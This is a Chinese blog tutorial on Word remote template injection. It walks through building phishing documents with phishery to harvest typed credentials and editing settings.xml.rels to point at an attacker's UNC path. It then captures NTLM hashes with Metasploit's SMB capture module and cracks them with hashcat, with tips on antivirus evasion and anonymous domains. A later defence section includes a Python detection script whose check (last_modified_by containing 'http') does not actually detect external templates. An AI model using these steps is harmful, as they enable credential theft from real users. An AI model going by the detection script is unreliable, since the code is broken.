Word模板注入攻击

Word模板注入攻击

0x00 工具准备

phishery:https://github.com/ryhanson/phishery/releases

office版本:office 2010

0x01 什么是Word模板注入攻击

Word模板注入攻击就是利用Word文档加载附加模板时的缺陷所发起的恶意请求而达到的攻击目的,所以当目标用户点开攻击者发给他的恶意word文档就可以通过向远程服务器发送恶意请求的方式,来盗取他的各类账号密码

 

0x02 通过远程模板注入盗取目标的各类普通账号密码

1、创建一个docx格式的word文件作为模板源文件,并编辑好文档内容

 

 

 

2、利用模板源文件(test.docx)生成真正的钓鱼文件

用到的工具为phishery,文档开头已提供下载链接(有多个平台的版本,此处用的linux下,在kali里操作的)

2.1 将test.docx放到工具phishery的目录下

 

 

2.2 执行以下命令生成真正的钓鱼文件
 ./phishery -u https://192.168.3.29/pass -i phishery.docx -o getpwd.docx 
 # 此处务必要注意,必须用 https 证书,都在当前目录下

 

 

2.3 修改生成的钓鱼文件的权限
chmod 777 getpwd.docx

 

 

3、启动phishery服务端(模拟web服务器)

phishery会用当前目录下的setting.json文件中的参数和证书作为默认配置,将记录到的账号密码放在credentials.json中

./phishery
cat credentials.json

 

 

 

4、将钓鱼文件getpwd.docx发送给目标

4.1 目标一点开文件就会弹出一个证书警告框,这一步很关键,只要用户选择了"是",我们的钓鱼文件就会自动去连接远程服务器并弹出基础认证钓鱼框,当目标输完账号以后就会被发送到我们自己的 smb 服务器上

 

 

 

 

 

 

4.2 当目标在弹出的登录框输入内容过后,回到攻击者的kali上,发现目标输入的账号密码都已经被记录

 

 

 

0x03 通过远程模板注入盗取目标系统用户密码的ntlm hash

1、修改之前生成的getpwd.docx解压出来的settings.xml.rels文件

1.1 将docx的文件后缀格式改为压缩文件的格式,如zip,然后将文件解压,找到word\_rels文件

 

1.2 编辑 settings.xml.rels,如下,定位到 Target 参数,将其改为 smb 的请求方式[即 UNC 路径],同时也可以尝试把 id[工具的敏感特征]改掉,以此躲避某些杀软

原来的:

 

 

更改的:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="file://192.168.175.137/" Tar getMode="External"/>
</Relationships>

 

 

2、修改好之后将之前解压出来的文件全部重新打包,并将后缀名字改回docx

2.1 全部重新打包为zip格式的压缩包

 

2.2 将打包好的压缩包的后缀更改为docx

 

 

3、回到攻击机kali上,打开msf,启动smb监听,将后续收到的hash都存到passwd中

msf > use auxiliary/server/capture/smb
msf > set srvhost 192.168.3.29
msf > set johnpwfile passwd
msf > exploit

 

 

4、将制作好的钓鱼文件getpwd发送给目标,当目标打开文件,攻击者便可以获取到他当前系统用户的密码hash

4.1 打开钓鱼文件,目标这里没有任何提示弹窗

 

 

4.2 再回到攻击机,发现目标用户系统的hash已经获取到了

 

 

4.3 最后,只需要把这些 hash 丢到 hashcat 里去跑就行了

 

0x05 关于实际利用过程中的一些注意事项

  • 需要一个靠谱的证书
  • 一个靠谱高匿的域名
  • 这种攻击方式的好处在于它并不依赖目标所使用的操作系统,完全依靠 word 自身特性来完成,所以有更强的适应性

 

0x06 来源

《Word 模版注入攻击详细利用过程 》--By Klion

 

转载于:https://www.cnblogs.com/ldhbetter/p/10877392.html

### Word文档代码注入方法及安全漏洞分析 Word文档作为一种广泛使用的办公文档格式,其安全性问题也日益受到关注。攻击者可以通过多种方式在Word文档中执行代码注入,从而实现远程控制、数据窃取等恶意行为。以下是几种常见的Word文档代码注入方法及其相关的安全漏洞。 #### 1. 恶意Office文档攻击 攻击者通常通过发送带有恶意附件的钓鱼邮件,诱导用户打开文档。一旦用户打开文档,内嵌的恶意代码会在用户无感知的情况下执行,进而从远程服务器下载并运行恶意程序,如远控木马或勒索病毒。这种攻击方式依赖于用户对文档的信任以及Office软件本身的漏洞[^1]。 #### 2. 模板注入(Template Injection) 模板注入是一种较为隐蔽的攻击方式,攻击者并不依赖传统的VBA宏或嵌入式脚本,而是通过修改Word文档的模板(.dotm文件)来注入恶意代码。当用户打开文档时,模板中的恶意代码会被自动加载并执行。这种方式常用于攻击企业的关键基础设施,攻击者通过钓鱼邮件发送伪装成简历或环境报告的文档,进而获取用户凭证和网络访问权限[^3]。 #### 3. XML外部实体(XXE)注入 在某些情况下,Word文档可能包含可解析的XML内容。攻击者可以利用XML解析器的漏洞,构造恶意XML文档,导致应用程序在解析时访问本地或远程资源,甚至执行任意代码。例如,攻击者可以构造一个包含恶意实体的XML文档,诱导用户打开后触发敏感信息泄露或远程代码执行[^2]。 --- ### 安全防护措施 为了有效防范Word文档中的代码注入攻击,建议采取以下安全措施: #### 1. 禁用宏和外部内容 - **禁用宏**:在Word中默认禁用宏功能,仅在确认文档来源可信的情况下启用宏。 - **阻止外部链接**:配置Word设置以阻止自动加载外部内容,如图片、模板或链接对象。 #### 2. 更新与补丁管理 - 定期更新Microsoft Office及相关软件,确保安装最新的安全补丁,防止已知漏洞被利用。 #### 3. 使用沙箱和隔离环境 - 在沙箱环境中打开可疑文档,避免恶意代码直接感染主系统。 - 使用虚拟机或隔离浏览器打开来自未知来源的文档。 #### 4. 启用文档验证机制 - 对于企业用户,可以部署文档验证工具,自动检测文档中是否存在可疑的宏、模板或外部引用。 - 使用数字签名机制,确保文档来源的可信性。 #### 5. 用户安全意识培训 - 对员工进行安全意识培训,识别钓鱼邮件和可疑附件。 - 提高用户对未知来源文档的警惕性,避免随意打开不明邮件附件。 --- ### 示例:检测Word文档中的恶意模板 以下是一个简单的Python脚本示例,用于检测Word文档是否包含外部模板链接: ```python from docx import Document def check_external_template(doc_path): try: doc = Document(doc_path) # 检查文档的关联模板 if 'http' in doc.core_properties.last_modified_by: print("警告:文档可能包含外部模板引用") else: print("文档未检测到外部模板引用") except Exception as e: print(f"无法解析文档:{e}") # 示例调用 check_external_template("suspicious_document.docx") ``` 该脚本通过读取文档的核心属性来检测是否存在外部模板引用,虽然不是万无一失,但可以作为初步筛查手段。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符  | 博主筛选后可见
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值